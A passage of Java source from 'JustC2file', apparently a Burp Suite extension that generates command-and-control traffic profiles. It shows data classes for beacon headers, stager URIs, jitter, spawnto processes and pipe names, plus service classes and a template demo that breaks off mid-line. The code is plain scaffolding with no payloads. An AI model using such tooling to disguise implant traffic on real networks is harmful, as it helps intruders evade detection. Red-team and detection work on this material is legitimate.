| } 88 | 89 | public String getGet_A() { 90 | return get_A; 91 | } 92 | 93 | public void setGet_A(String get_A) { 94 | this.get_A = get_A; 95 | } 96 | 97 | public String getGet_AAAA() { 98 | return get_AAAA; 99 | } 100 | 101 | public void setGet_AAAA(String get_AAAA) { 102 | this.get_AAAA = get_AAAA; 103 | } 104 | 105 | public String getGet_TXT() { 106 | return get_TXT; 107 | } 108 | 109 | public void setGet_TXT(String get_TXT) { 110 | this.get_TXT = get_TXT; 111 | } 112 | 113 | public String getPut_metadata() { 114 | return put_metadata; 115 | } 116 | 117 | public void setPut_metadata(String put_metadata) { 118 | this.put_metadata = put_metadata; 119 | } 120 | 121 | public String getPut_output() { 122 | return put_output; 123 | } 124 | 125 | public void setPut_output(String put_output) { 126 | this.put_output = put_output; 127 | } 128 | 129 | public String getNs_response() { 130 | return ns_response; 131 | } 132 | 133 | public void setNs_response(String ns_response) { 134 | this.ns_response = ns_response; 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/HttpGetBeacon.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | /** 3 | * @program: JustC2file 4 | * @author: Peithon 5 | * @create: 2022-01-08 09:09 6 | **/ 7 | public class HttpGetBeacon { 8 | private String uri; 9 | private String host; 10 | private String get_client_header1; 11 | private String get_client_header2; 12 | private String get_client_header3; 13 | private String get_client_header4; 14 | private String get_server_header1; 15 | private String get_server_header2; 16 | private String get_server_header3; 17 | private String get_server_header4; 18 | private String get_server_server; 19 | private String get_server_contentType; 20 | private String get_metadata_encode; 21 | private String get_server_encode; 22 | private String get_server_prepend; 23 | private String get_server_prepend2; 24 | private String get_server_append; 25 | 26 | public String getUri() { 27 | return uri; 28 | } 29 | 30 | public void setUri(String uri) { 31 | this.uri = uri; 32 | } 33 | 34 | public String getHost() { 35 | return host; 36 | } 37 | 38 | public void setHost(String host) { 39 | this.host = host; 40 | } 41 | 42 | public String getGet_client_header1() { 43 | return get_client_header1; 44 | } 45 | 46 | public void setGet_client_header1(String get_client_header1) { 47 | this.get_client_header1 = get_client_header1; 48 | } 49 | 50 | public String getGet_client_header2() { 51 | return get_client_header2; 52 | } 53 | 54 | public void setGet_client_header2(String get_client_header2) { 55 | this.get_client_header2 = get_client_header2; 56 | } 57 | 58 | public String getGet_client_header3() { 59 | return get_client_header3; 60 | } 61 | 62 | public void setGet_client_header3(String get_client_header3) { 63 | this.get_client_header3 = get_client_header3; 64 | } 65 | 66 | public String getGet_client_header4() { 67 | return get_client_header4; 68 | } 69 | 70 | public void setGet_client_header4(String get_client_header4) { 71 | this.get_client_header4 = get_client_header4; 72 | } 73 | 74 | public String getGet_server_header1() { 75 | return get_server_header1; 76 | } 77 | 78 | public void setGet_server_header1(String get_server_header1) { 79 | this.get_server_header1 = get_server_header1; 80 | } 81 | 82 | public String getGet_server_header2() { 83 | return get_server_header2; 84 | } 85 | 86 | public void setGet_server_header2(String get_server_header2) { 87 | this.get_server_header2 = get_server_header2; 88 | } 89 | 90 | public String getGet_server_header3() { 91 | return get_server_header3; 92 | } 93 | 94 | public void setGet_server_header3(String get_server_header3) { 95 | this.get_server_header3 = get_server_header3; 96 | } 97 | 98 | public String getGet_server_header4() { 99 | return get_server_header4; 100 | } 101 | 102 | public void setGet_server_header4(String get_server_header4) { 103 | this.get_server_header4 = get_server_header4; 104 | } 105 | 106 | public String getGet_server_server() { 107 | return get_server_server; 108 | } 109 | 110 | public void setGet_server_server(String get_server_server) { 111 | this.get_server_server = get_server_server; 112 | } 113 | 114 | public String getGet_server_contentType() { 115 | return get_server_contentType; 116 | } 117 | 118 | public void setGet_server_contentType(String get_server_contentType) { 119 | this.get_server_contentType = get_server_contentType; 120 | } 121 | 122 | public String getGet_metadata_encode() { 123 | return get_metadata_encode; 124 | } 125 | 126 | public void setGet_metadata_encode(String get_metadata_encode) { 127 | this.get_metadata_encode = get_metadata_encode; 128 | } 129 | 130 | public String getGet_server_encode() { 131 | return get_server_encode; 132 | } 133 | 134 | public void setGet_server_encode(String get_server_encode) { 135 | this.get_server_encode = get_server_encode; 136 | } 137 | 138 | public String getGet_server_prepend() { 139 | return get_server_prepend; 140 | } 141 | 142 | public void setGet_server_prepend(String get_server_prepend) { 143 | this.get_server_prepend = get_server_prepend; 144 | } 145 | 146 | public String getGet_server_append() { 147 | return get_server_append; 148 | } 149 | 150 | public void setGet_server_append(String get_server_append) { 151 | this.get_server_append = get_server_append; 152 | } 153 | 154 | public String getGet_server_prepend2() { 155 | return get_server_prepend2; 156 | } 157 | 158 | public void setGet_server_prepend2(String get_server_prepend2) { 159 | this.get_server_prepend2 = get_server_prepend2; 160 | } 161 | } 162 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/HttpPostBeacon.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | 3 | /** 4 | * @program: JustC2file 5 | * @author: Peithon 6 | * @github: https://github.com/Peithon/JustC2file 7 | * @create: 2022-01-10 15:30 8 | **/ 9 | public class HttpPostBeacon { 10 | private String http_post_uri; 11 | private String post_client_content; 12 | private String post_client_header1; 13 | private String post_client_header2; 14 | private String post_client_header3; 15 | private String post_client_header4; 16 | private String http_post_host; 17 | private String post_client_parameter1; 18 | private String post_client_parameter2; 19 | private String post_client_parameter3; 20 | private String post_server_server; 21 | private String post_server_content; 22 | private String post_server_header1; 23 | private String post_server_header2; 24 | private String post_server_header3; 25 | private String post_server_header4; 26 | private String post_client_encode; 27 | private String post_server_encode; 28 | private String post_server_prepend; 29 | private String post_server_prepend2; 30 | private String post_server_append; 31 | 32 | public String getHttp_post_uri() { 33 | return http_post_uri; 34 | } 35 | 36 | public void setHttp_post_uri(String http_post_uri) { 37 | this.http_post_uri = http_post_uri; 38 | } 39 | 40 | public String getPost_client_content() { 41 | return post_client_content; 42 | } 43 | 44 | public void setPost_client_content(String post_client_content) { 45 | this.post_client_content = post_client_content; 46 | } 47 | 48 | public String getPost_client_header1() { 49 | return post_client_header1; 50 | } 51 | 52 | public void setPost_client_header1(String post_client_header1) { 53 | this.post_client_header1 = post_client_header1; 54 | } 55 | 56 | public String getPost_client_header2() { 57 | return post_client_header2; 58 | } 59 | 60 | public void setPost_client_header2(String post_client_header2) { 61 | this.post_client_header2 = post_client_header2; 62 | } 63 | 64 | public String getPost_client_header3() { 65 | return post_client_header3; 66 | } 67 | 68 | public void setPost_client_header3(String post_client_header3) { 69 | this.post_client_header3 = post_client_header3; 70 | } 71 | 72 | public String getPost_client_header4() { 73 | return post_client_header4; 74 | } 75 | 76 | public void setPost_client_header4(String post_client_header4) { 77 | this.post_client_header4 = post_client_header4; 78 | } 79 | 80 | public String getPost_server_header1() { 81 | return post_server_header1; 82 | } 83 | 84 | public void setPost_server_header1(String post_server_header1) { 85 | this.post_server_header1 = post_server_header1; 86 | } 87 | 88 | public String getPost_server_header2() { 89 | return post_server_header2; 90 | } 91 | 92 | public void setPost_server_header2(String post_server_header2) { 93 | this.post_server_header2 = post_server_header2; 94 | } 95 | 96 | public String getPost_server_header3() { 97 | return post_server_header3; 98 | } 99 | 100 | public void setPost_server_header3(String post_server_header3) { 101 | this.post_server_header3 = post_server_header3; 102 | } 103 | 104 | public String getPost_server_header4() { 105 | return post_server_header4; 106 | } 107 | 108 | public void setPost_server_header4(String post_server_header4) { 109 | this.post_server_header4 = post_server_header4; 110 | } 111 | 112 | public String getHttp_post_host() { 113 | return http_post_host; 114 | } 115 | 116 | public void setHttp_post_host(String http_post_host) { 117 | this.http_post_host = http_post_host; 118 | } 119 | 120 | public String getPost_client_parameter1() { 121 | return post_client_parameter1; 122 | } 123 | 124 | public void setPost_client_parameter1(String post_client_parameter1) { 125 | this.post_client_parameter1 = post_client_parameter1; 126 | } 127 | 128 | public String getPost_client_parameter2() { 129 | return post_client_parameter2; 130 | } 131 | 132 | public void setPost_client_parameter2(String post_client_parameter2) { 133 | this.post_client_parameter2 = post_client_parameter2; 134 | } 135 | 136 | public String getPost_client_parameter3() { 137 | return post_client_parameter3; 138 | } 139 | 140 | public void setPost_client_parameter3(String post_client_parameter3) { 141 | this.post_client_parameter3 = post_client_parameter3; 142 | } 143 | 144 | public String getPost_server_server() { 145 | return post_server_server; 146 | } 147 | 148 | public void setPost_server_server(String post_server_server) { 149 | this.post_server_server = post_server_server; 150 | } 151 | 152 | public String getPost_server_content() { 153 | return post_server_content; 154 | } 155 | 156 | public void setPost_server_content(String post_server_content) { 157 | this.post_server_content = post_server_content; 158 | } 159 | 160 | public String getPost_client_encode() { 161 | return post_client_encode; 162 | } 163 | 164 | public void setPost_client_encode(String post_client_encode) { 165 | this.post_client_encode = post_client_encode; 166 | } 167 | 168 | public String getPost_server_encode() { 169 | return post_server_encode; 170 | } 171 | 172 | public void setPost_server_encode(String post_server_encode) { 173 | this.post_server_encode = post_server_encode; 174 | } 175 | 176 | public String getPost_server_prepend() { 177 | return post_server_prepend; 178 | } 179 | 180 | public void setPost_server_prepend(String post_server_prepend) { 181 | this.post_server_prepend = post_server_prepend; 182 | } 183 | 184 | public String getPost_server_append() { 185 | return post_server_append; 186 | } 187 | 188 | public void setPost_server_append(String post_server_append) { 189 | this.post_server_append = post_server_append; 190 | } 191 | 192 | public String getPost_server_prepend2() { 193 | return post_server_prepend2; 194 | } 195 | 196 | public void setPost_server_prepend2(String post_server_prepend2) { 197 | this.post_server_prepend2 = post_server_prepend2; 198 | } 199 | } 200 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/HttpStager.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | 3 | /** 4 | * @program: JustC2file 5 | * @author: Peithon 6 | * @github: https://github.com/Peithon/JustC2file 7 | * @create: 2022-01-10 19:54 8 | **/ 9 | public class HttpStager { 10 | private String uri_x86; 11 | private String uri_x64; 12 | private String server_Content_Type; 13 | private String server_Server; 14 | private String server_header1; 15 | private String server_header2; 16 | private String server_header3; 17 | private String server_header4; 18 | private String output_prepend; 19 | private String output_append; 20 | private String client_Accept; 21 | private String output_encode; 22 | private String output_prepend2; 23 | 24 | public String getUri_x86() { 25 | return uri_x86; 26 | } 27 | 28 | public void setUri_x86(String uri_x86) { 29 | this.uri_x86 = uri_x86; 30 | } 31 | 32 | public String getUri_x64() { 33 | return uri_x64; 34 | } 35 | 36 | public void setUri_x64(String uri_x64) { 37 | this.uri_x64 = uri_x64; 38 | } 39 | 40 | public String getServer_Content_Type() { 41 | return server_Content_Type; 42 | } 43 | 44 | public void setServer_Content_Type(String server_Content_Type) { 45 | this.server_Content_Type = server_Content_Type; 46 | } 47 | 48 | public String getServer_Server() { 49 | return server_Server; 50 | } 51 | 52 | public void setServer_Server(String server_Server) { 53 | this.server_Server = server_Server; 54 | } 55 | 56 | public String getServer_header1() { 57 | return server_header1; 58 | } 59 | 60 | public void setServer_header1(String server_header1) { 61 | this.server_header1 = server_header1; 62 | } 63 | 64 | public String getServer_header2() { 65 | return server_header2; 66 | } 67 | 68 | public void setServer_header2(String server_header2) { 69 | this.server_header2 = server_header2; 70 | } 71 | 72 | public String getServer_header3() { 73 | return server_header3; 74 | } 75 | 76 | public void setServer_header3(String server_header3) { 77 | this.server_header3 = server_header3; 78 | } 79 | 80 | public String getServer_header4() { 81 | return server_header4; 82 | } 83 | 84 | public void setServer_header4(String server_header4) { 85 | this.server_header4 = server_header4; 86 | } 87 | 88 | public String getOutput_prepend() { 89 | return output_prepend; 90 | } 91 | 92 | public void setOutput_prepend(String output_prepend) { 93 | this.output_prepend = output_prepend; 94 | } 95 | 96 | public String getOutput_append() { 97 | return output_append; 98 | } 99 | 100 | public void setOutput_append(String output_append) { 101 | this.output_append = output_append; 102 | } 103 | 104 | public String getClient_Accept() { 105 | return client_Accept; 106 | } 107 | 108 | public void setClient_Accept(String client_Accept) { 109 | this.client_Accept = client_Accept; 110 | } 111 | 112 | public String getOutput_encode() { 113 | return output_encode; 114 | } 115 | 116 | public void setOutput_encode(String output_encode) { 117 | this.output_encode = output_encode; 118 | } 119 | 120 | public String getOutput_prepend2() { 121 | return output_prepend2; 122 | } 123 | 124 | public void setOutput_prepend2(String output_prepend2) { 125 | this.output_prepend2 = output_prepend2; 126 | } 127 | } 128 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/HttpsCertificate.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | /** 3 | * @program: JustC2file 4 | * @author: Peithon 5 | * @create: 2022-01-08 09:09 6 | **/ 7 | public class HttpsCertificate { 8 | private String c; 9 | private String cn; 10 | private String ou; 11 | private String o; 12 | private String validity; 13 | 14 | public String getC() { 15 | return c; 16 | } 17 | 18 | public void setC(String c) { 19 | this.c = c; 20 | } 21 | 22 | public String getCn() { 23 | return cn; 24 | } 25 | 26 | public void setCn(String cn) { 27 | this.cn = cn; 28 | } 29 | 30 | public String getOu() { 31 | return ou; 32 | } 33 | 34 | public void setOu(String ou) { 35 | this.ou = ou; 36 | } 37 | 38 | public String getO() { 39 | return o; 40 | } 41 | 42 | public void setO(String o) { 43 | this.o = o; 44 | } 45 | 46 | public String getValidity() { 47 | return validity; 48 | } 49 | 50 | public void setValidity(String validity) { 51 | this.validity = validity; 52 | } 53 | 54 | @Override 55 | public String toString() { 56 | return "HttpsCertificate{" + 57 | "c='" + c + '\'' + 58 | ", cn='" + cn + '\'' + 59 | ", ou='" + ou + '\'' + 60 | ", o='" + o + '\'' + 61 | ", validity='" + validity + '\'' + 62 | '}'; 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/Persiancat.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | /** 3 | * @program: JustC2file 4 | * @author: Peithon 5 | * @create: 2022-01-08 09:09 6 | **/ 7 | public class Persiancat { 8 | private String timestamp; 9 | private String sample_name; 10 | private String sleeptime; 11 | private String jitter; 12 | private String data_jitter; 13 | private String tcp_port; 14 | private String useragent; 15 | private String host_stage; 16 | 17 | public String getTimestamp() { 18 | return timestamp; 19 | } 20 | 21 | public void setTimestamp(String timestamp) { 22 | this.timestamp = timestamp; 23 | } 24 | 25 | public String getSample_name() { 26 | return sample_name; 27 | } 28 | 29 | public void setSample_name(String sample_name) { 30 | this.sample_name = sample_name; 31 | } 32 | 33 | public String getSleeptime() { 34 | return sleeptime; 35 | } 36 | 37 | public void setSleeptime(String sleeptime) { 38 | this.sleeptime = sleeptime; 39 | } 40 | 41 | public String getJitter() { 42 | return jitter; 43 | } 44 | 45 | public void setJitter(String jitter) { 46 | this.jitter = jitter; 47 | } 48 | 49 | public String getData_jitter() { 50 | return data_jitter; 51 | } 52 | 53 | public void setData_jitter(String data_jitter) { 54 | this.data_jitter = data_jitter; 55 | } 56 | 57 | public String getTcp_port() { 58 | return tcp_port; 59 | } 60 | 61 | public void setTcp_port(String tcp_port) { 62 | this.tcp_port = tcp_port; 63 | } 64 | 65 | public String getUseragent() { 66 | return useragent; 67 | } 68 | 69 | public void setUseragent(String useragent) { 70 | this.useragent = useragent; 71 | } 72 | 73 | public String getHost_stage() { 74 | return host_stage; 75 | } 76 | 77 | public void setHost_stage(String host_stage) { 78 | this.host_stage = host_stage; 79 | } 80 | 81 | } 82 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/PostEx.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | /** 3 | * @program: JustC2file 4 | * @author: Peithon 5 | * @create: 2022-01-08 09:09 6 | **/ 7 | public class PostEx { 8 | private String spawnto_x86; 9 | private String spawnto_x64; 10 | private String pipename; 11 | 12 | public String getSpawnto_x86() { 13 | return spawnto_x86; 14 | } 15 | 16 | public void setSpawnto_x86(String spawnto_x86) { 17 | this.spawnto_x86 = spawnto_x86; 18 | } 19 | 20 | public String getSpawnto_x64() { 21 | return spawnto_x64; 22 | } 23 | 24 | public void setSpawnto_x64(String spawnto_x64) { 25 | this.spawnto_x64 = spawnto_x64; 26 | } 27 | 28 | public String getPipename() { 29 | return pipename; 30 | } 31 | 32 | public void setPipename(String pipename) { 33 | this.pipename = pipename; 34 | } 35 | 36 | @Override 37 | public String toString() { 38 | return "PostEx{" + 39 | "spawnto_x86='" + spawnto_x86 + '\'' + 40 | ", spawnto_x64='" + spawnto_x64 + '\'' + 41 | ", pipename='" + pipename + '\'' + 42 | '}'; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/DnsBeaconService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import com.test.burp.model.DnsBeacon; 4 | 5 | import java.util.Map; 6 | 7 | public interface DnsBeaconService { 8 | DnsBeacon dataDnsBeacon(); 9 | Map putdataDnsBeacon(); 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/HttpGetBeaconService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.model.HttpGetBeacon; 6 | 7 | import java.util.Map; 8 | 9 | public interface HttpGetBeaconService { 10 | HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message); 11 | Map putdataHttpGetBeacon(); 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/HttpPostBeaconService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.model.HttpPostBeacon; 6 | 7 | import java.util.Map; 8 | 9 | public interface HttpPostBeaconService { 10 | HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message); 11 | Map putdataHttpPostBeacon(); 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/HttpStagerService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.model.HttpStager; 6 | 7 | import java.util.Map; 8 | 9 | public interface HttpStagerService { 10 | HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message); 11 | Map putdataHttpStager(); 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/HttpsCertificateService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import com.test.burp.model.HttpsCertificate; 4 | 5 | import java.util.Map; 6 | /** 7 | * @program: JustC2file 8 | * @author: Peithon 9 | * @create: 2022-01-08 09:09 10 | **/ 11 | public interface HttpsCertificateService { 12 | HttpsCertificate dataHttpsCertificate(); 13 | Map putdataHttpsCertificate(); 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/PersiancatService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import com.test.burp.model.Persiancat; 4 | 5 | import java.util.Map; 6 | /** 7 | * @program: JustC2file 8 | * @author: Peithon 9 | * @create: 2022-01-08 09:09 10 | **/ 11 | public interface PersiancatService { 12 | Persiancat dataPersiancat(); 13 | Map putdataPersiancat(); 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/PostExService.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service; 2 | 3 | import com.test.burp.model.PostEx; 4 | 5 | import java.util.Map; 6 | /** 7 | * @program: JustC2file 8 | * @author: Peithon 9 | * @create: 2022-01-08 09:09 10 | **/ 11 | public interface PostExService { 12 | PostEx dataPostEx(); 13 | Map putdataPostEx(); 14 | } 15 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/DnsBeaconServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import com.test.burp.dao.DnsBeaconDao; 4 | import com.test.burp.dao.impl.DnsBeaconDaoImpl; 5 | import com.test.burp.model.DnsBeacon; 6 | import com.test.burp.service.DnsBeaconService; 7 | 8 | import java.util.Map; 9 | 10 | /** 11 | * @program: JustC2file 12 | * @author: Peithon 13 | * @github: https://github.com/Peithon/JustC2file 14 | * @create: 2022-01-13 16:37 15 | **/ 16 | public class DnsBeaconServiceImpl implements DnsBeaconService { 17 | private DnsBeaconDao dnsBeaconDao = new DnsBeaconDaoImpl(); 18 | @Override 19 | public DnsBeacon dataDnsBeacon() { 20 | return dnsBeaconDao.dataDnsBeacon(); 21 | } 22 | 23 | @Override 24 | public Map putdataDnsBeacon() { 25 | this.dataDnsBeacon(); 26 | return dnsBeaconDao.putdataDnsBeacon(); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/HttpGetBeaconServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.dao.HttpGetBeaconDao; 6 | import com.test.burp.dao.impl.HttpGetBeaconDaoImpl; 7 | import com.test.burp.model.HttpGetBeacon; 8 | import com.test.burp.service.HttpGetBeaconService; 9 | 10 | import java.util.Map; 11 | 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @github: https://github.com/Peithon/JustC2file 16 | * @create: 2022-01-10 15:25 17 | **/ 18 | public class HttpGetBeaconServiceImpl implements HttpGetBeaconService { 19 | private HttpGetBeaconDao httpGetBeaconDao = new HttpGetBeaconDaoImpl(); 20 | @Override 21 | public HttpGetBeacon dataHttpGetBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 22 | return httpGetBeaconDao.dataHttpGetBeacon(callbacks,message); 23 | } 24 | 25 | @Override 26 | public Map putdataHttpGetBeacon() { 27 | return httpGetBeaconDao.putdataHttpGetBeacon(); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/HttpPostBeaconServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.dao.HttpPostBeaconDao; 6 | import com.test.burp.dao.impl.HttpPostBeaconDaoImpl; 7 | import com.test.burp.model.HttpPostBeacon; 8 | import com.test.burp.service.HttpPostBeaconService; 9 | 10 | import java.util.Map; 11 | 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @github: https://github.com/Peithon/JustC2file 16 | * @create: 2022-01-10 19:51 17 | **/ 18 | public class HttpPostBeaconServiceImpl implements HttpPostBeaconService { 19 | private HttpPostBeaconDao httpPostBeaconDao = new HttpPostBeaconDaoImpl(); 20 | @Override 21 | public HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 22 | return httpPostBeaconDao.dataHttpPostBeacon(callbacks,message); 23 | } 24 | 25 | @Override 26 | public Map putdataHttpPostBeacon() { 27 | return httpPostBeaconDao.putdataHttpPostBeacon(); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/HttpStagerServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import com.test.burp.dao.HttpStagerDao; 6 | import com.test.burp.dao.impl.HttpStagerDaoImpl; 7 | import com.test.burp.model.HttpStager; 8 | import com.test.burp.service.HttpStagerService; 9 | 10 | import java.util.Map; 11 | 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @github: https://github.com/Peithon/JustC2file 16 | * @create: 2022-01-11 15:46 17 | **/ 18 | public class HttpStagerServiceImpl implements HttpStagerService { 19 | private HttpStagerDao httpStagerDao = new HttpStagerDaoImpl(); 20 | @Override 21 | public HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 22 | return httpStagerDao.dataHttpStager(callbacks,message); 23 | } 24 | 25 | @Override 26 | public Map putdataHttpStager() { 27 | return httpStagerDao.putdataHttpStager(); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/HttpsCertificateServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import com.test.burp.dao.HttpsCertificateDao; 4 | import com.test.burp.dao.impl.HttpsCertificateDaoImpl; 5 | import com.test.burp.model.HttpsCertificate; 6 | import com.test.burp.service.HttpsCertificateService; 7 | 8 | import java.util.Map; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class HttpsCertificateServiceImpl implements HttpsCertificateService { 15 | private HttpsCertificateDao httpsCertificateDao = new HttpsCertificateDaoImpl(); 16 | @Override 17 | public HttpsCertificate dataHttpsCertificate() { 18 | return httpsCertificateDao.dataHttpsCertificate(); 19 | } 20 | 21 | @Override 22 | public Map putdataHttpsCertificate() { 23 | this.dataHttpsCertificate(); 24 | return httpsCertificateDao.putdataHttpsCertificate(); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/PersiancatServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import com.test.burp.dao.PersiancatDao; 4 | import com.test.burp.dao.impl.PersiancatDaoImpl; 5 | import com.test.burp.model.Persiancat; 6 | import com.test.burp.service.PersiancatService; 7 | 8 | import java.util.Map; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class PersiancatServiceImpl implements PersiancatService { 15 | private PersiancatDao persiancatDao = new PersiancatDaoImpl(); 16 | 17 | @Override 18 | public Persiancat dataPersiancat() { 19 | return persiancatDao.dataPersiancat(); 20 | } 21 | 22 | @Override 23 | public Map putdataPersiancat() { 24 | this.dataPersiancat(); 25 | return persiancatDao.putdataPersiancat(); 26 | } 27 | 28 | } 29 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/service/impl/PostExServiceImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.service.impl; 2 | 3 | import com.test.burp.dao.PostExDao; 4 | import com.test.burp.dao.impl.PostExDaoImpl; 5 | import com.test.burp.model.PostEx; 6 | import com.test.burp.service.PostExService; 7 | 8 | import java.util.Map; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class PostExServiceImpl implements PostExService { 15 | private PostExDao postExDao = new PostExDaoImpl(); 16 | @Override 17 | public PostEx dataPostEx() { 18 | return postExDao.dataPostEx(); 19 | } 20 | 21 | @Override 22 | public Map putdataPostEx() { 23 | this.dataPostEx(); 24 | return postExDao.putdataPostEx(); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/testcode/FreemarkerDemo.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.testcode; 2 | 3 | import com.test.burp.dao.impl.AnalyzeInfo; 4 | import com.test.burp.dao.impl.LoadFile; 5 | import com.test.burp.service.HttpsCertificateService; 6 | import com.test.burp.service.PersiancatService; 7 | import com.test.burp.service.PostExService; 8 | import com.test.burp.service.impl.HttpsCertificateServiceImpl; 9 | import com.test.burp.service.impl.PersiancatServiceImpl; 10 | import com.test.burp.service.impl.PostExServiceImpl; 11 | import freemarker.template.Configuration; 12 | import freemarker.template.Template; 13 | 14 | import java.io.File; 15 | import java.io.IOException; 16 | import java.io.StringWriter; 17 | import java.nio.ByteBuffer; 18 | import java.nio.charset.Charset; 19 | import java.nio.charset.StandardCharsets; 20 | import java.text.SimpleDateFormat; 21 | import java.util.*; 22 | import java.util.regex.Matcher; 23 | import java.util.regex.Pattern; 24 | import java.util.stream.Collectors; 25 | 26 | import static java.util.Arrays.asList; 27 | 28 | public class FreemarkerDemo { 29 | private final String TEMPLATE_PATH = "src/main/resources/templates"; 30 | private static PersiancatService persiancatService = new PersiancatServiceImpl(); 31 | private static HttpsCertificateService httpsCertificateService = new HttpsCertificateServiceImpl(); 32 | private static PostExService postExService = new PostExServiceImpl(); 33 | private static AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 34 | public FreemarkerDemo() { 35 | // step1 创建freeMarker配置实例 36 | Configuration configuration = new Configuration(); 37 | try { 38 | // step2 获取模版路径 39 | configuration.setDirectoryForTemplateLoading(new File(TEMPLATE_PATH)); 40 | // step3 创建数据模型 41 | Map dataMap = new HashMap(); 42 | dataMap.put("http_get_uri", new SimpleDateFormat("yyyy-MM-dd hh:mm:ss").format(new Date())); 43 | dataMap.put("get_client_header1", "AutoCode;\r\n\t\t1231231\r\n\t\ttyyttttt"); 44 | //rand.nextInt(n)中的参数n代表的是生成随机整数的数量,整数取值为[30,60] 45 | dataMap.put("http_get_host",String.valueOf((new Random().nextInt(30)+30)*100)); 46 | dataMap.put("http_getReq_Server","15"); 47 | // step4 加载模版文件 48 | Template template = configuration.getTemplate("test.ftl"); 49 | // step5 生成数据 50 | //Writer out = null; 51 | //out = new OutputStreamWriter(System.out); 52 | // step6 输出文件 53 | StringWriter strWriter = new StringWriter(); 54 | template.process(dataMap, strWriter); 55 | String str = strWriter.toString(); 56 | System.out.println(str); 57 | // 获取时间 58 | // Date date = new Date(); 59 | // SimpleDateFormat dateFormat= new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); 60 | // System.out.println(dateFormat.format(date)); 61 | } catch (Exception e) { 62 | // e.printStackTrace(); 63 | // } finally { 64 | // try { 65 | // if (null != out) { 66 | // out.flush(); 67 | // } 68 | // } catch (Exception e2) { 69 | // e2.printStackTrace(); 70 | // } 71 | } 72 | } 73 | 74 | public static String lookTestParameter(){ 75 | int randnum = new Random().nextInt(3)+3; 76 | List list = new ArrayList<>(searchTestParam(randnum)); 77 | StringBuilder line = new 